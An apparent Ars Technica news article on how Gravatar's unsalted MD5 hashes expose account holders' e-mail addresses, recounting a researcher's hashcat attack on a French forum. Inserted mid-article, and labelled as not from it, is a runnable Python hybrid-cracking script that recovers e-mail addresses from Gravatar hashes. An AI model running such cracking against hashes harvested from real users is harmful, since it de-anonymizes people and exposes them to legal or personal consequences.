Got an account on a site like Github? Hackers may know your e-mail address | Ars Technica

Researcher de-anonymizes forum members who post extremist views.

LAS VEGAS—If you have an account on Github, StackExchange, or any one of countless other sites, there's a good chance hackers can identify the e-mail address you used to register it. That's because Gravatar, a behind-the-scenes service that says it works with millions of sites, publishes that address as an unsalted MD5 hash, a form of protection that in many cases is trivial to reverse.

People have been warning about the privacy risk posed by Gravatar, short for Globally Recognized Avatar, since at least 2009. That's when a blogger showed he was able to crack the cryptographic hashes that the service uses to uniquely identify its users. Gravatar, it turned out, derived the hashes directly from the user's e-mail address, and the blogger was able to recover the addresses behind about 10 percent of the more than 80,000 user IDs he harvested. Now, a researcher has upped the ante by using a more advanced cracking technique to de-anonymize participants voicing racial hatred and other extreme views in online forums hosted in France.

Speaking at the PasswordsCon conference in Las Vegas Wednesday, security researcher Dominique Bongard said he identified 45 percent of the e-mail addresses used to post comments he found in France's most well-known political forum, which he declined to mention by name. His job was made easier by Gravatar's use of the MD5 hash function, which is designed to generate hashes quickly and with a minimum of computing resources. Had Gravatar used bcrypt or another "slow" algorithm, his task would have taken considerably longer, though not impossibly so: because any site must be able to compute the hash from an address on its own to look up the avatar, the hash cannot be salted per user, so a slower function raises the attacker's cost without changing the basic problem. In a country such as France, where there can be severe legal penalties for voicing extreme opinions, extracting the e-mail addresses isn't without its consequences.

"If [adversaries] have your e-mail address at Yahoo dot France, then they can go to the judge, the judge goes to Yahoo and then they get the guy's address," Bongard, who is CEO of Switzerland-based 0xcite, told Ars.

During the discussion, I used my [email protected] address to create my own account on Github. By viewing the page source, I could see that Github had automatically generated a Gravatar avatar URL containing the following identifier:

https://secure.gravatar.com/avatar/87d4e3cf6f9c856d0d1ae370a4d81e78?s=140&

The 32-character hexadecimal string 87d4e3cf6f9c856d0d1ae370a4d81e78, it turns out, is the MD5 hash of [email protected], and it's viewable by anyone who takes the time to look.

Bongard cracked the hashes with the freely available Hashcat password-cracking program, configured with a few tweaks to run what's known as a hybrid attack. One side of the attack was a word list containing only the domains of gmail.com and other popular e-mail services. The other side was a mask attack, a constrained brute force that ran through all eight-character local parts built from the characters allowed in e-mail addresses. Hashcat joins each mask candidate to each domain, hashes the result, and compares it against the harvested list; with that approach he reached the 45 percent mark in about a day. No doubt he could have cracked more with additional time and effort.
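As an added, runnable illustration of both steps described above, the hash a site such as Github exposes and the mask-plus-domain hybrid search, here is a Python sketch that is not from the article or from Bongard's talk. It applies Gravatar's documented hashing rule (trim whitespace, lowercase, MD5) and runs a pure-Python version of the hybrid attack over a constructed list of three domains and a three-character mask; the domains, the sample addresses and the reduced 36-symbol charset are assumptions chosen so it finishes in seconds, and the far larger eight-character keyspace hashcat would actually search is counted rather than enumerated.

```python
import hashlib
import itertools
import string


def gravatar_hash(email: str) -> str:
    """Gravatar's documented rule: trim whitespace, lowercase, MD5, hex-encode.
    There is no salt, so one address always maps to the same 32-character string."""
    return hashlib.md5(email.strip().lower().encode("utf-8")).hexdigest()


def gravatar_url(email: str, size: int = 140) -> str:
    """The kind of avatar URL a site embeds in its page source."""
    return f"https://secure.gravatar.com/avatar/{gravatar_hash(email)}?s={size}"


# Assumed, deliberately small charset for the mask. A real run would use the
# full set of characters an e-mail local part allows (hashcat ?a or a custom set).
MASK_CHARSET = string.ascii_lowercase + string.digits


def keyspace(max_len: int, charset_size: int, n_domains: int) -> int:
    """Number of candidates: local parts of length 1..max_len times the domain list."""
    return sum(charset_size ** n for n in range(1, max_len + 1)) * n_domains


def hybrid_crack(target_hashes, domains, max_len, charset=MASK_CHARSET):
    """Mask-on-the-left, wordlist-on-the-right hybrid search (the shape of
    hashcat's -a 7 mode). Every local part over `charset` of up to `max_len`
    characters is joined with '@' and each domain, hashed with plain MD5 as
    hashcat would, and checked against the harvested hashes.
    Returns {hash: recovered e-mail} for every hash that was hit."""
    remaining = set(target_hashes)
    recovered = {}
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            if not remaining:
                return recovered
            local = "".join(chars)
            for domain in domains:
                candidate = f"{local}@{domain}"
                h = hashlib.md5(candidate.encode("utf-8")).hexdigest()
                if h in remaining:
                    recovered[h] = candidate
                    remaining.discard(h)
    return recovered


# Constructed sample data, not harvested from any real forum: a tiny domain
# word list and four addresses. The last one has a local part longer than the
# mask, so it stays uncracked, like the 55 percent Bongard did not recover.
DOMAINS = ["gmail.com", "yahoo.fr", "hotmail.com"]
SAMPLE_EMAILS = ["bob@gmail.com", "al@yahoo.fr", "x1z@hotmail.com",
                 "longusername@example.org"]
HARVESTED = [gravatar_hash(e) for e in SAMPLE_EMAILS]


def run_demo(max_len: int = 3):
    """Crack the constructed sample; return the hits and the recovered fraction."""
    recovered = hybrid_crack(HARVESTED, DOMAINS, max_len)
    return recovered, len(recovered) / len(HARVESTED)


if __name__ == "__main__":
    print(gravatar_url("bob@gmail.com"))
    recovered, fraction = run_demo()
    for h in HARVESTED:
        print(h, "->", recovered.get(h, "(not recovered)"))
    print(f"recovered {fraction:.0%} of the sample")
    # Why the real attack takes a day rather than a second: eight characters
    # over even this reduced 36-symbol charset is on the order of 10^12
    # candidates per domain before the full allowed charset is considered.
    print("8-char keyspace, 36 symbols, 1 domain:", keyspace(8, 36, 1))
```

The `keyspace` figure is the practical takeaway: the search cost is set by the length and charset of the local part, not by anything Gravatar controls, and because every site computes the same unsalted hash, a single cracked hash deanonymizes that address everywhere it appears.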

I spent time reading the privacy policies for both Gravatar and Github and found no mention that e-mail addresses used to register accounts are disclosed to the world in a hashed format. It's likely that the officials representing those services don't consider the unique cryptographic strings to be personally identifying information. Even uncracked, though, the hash is a stable identifier: the same address produces the same string on every Gravatar-enabled site, so accounts can be linked across sites without recovering the address at all. Given that, and the growing ease of cracking the hashes outright, it's probably time they did.
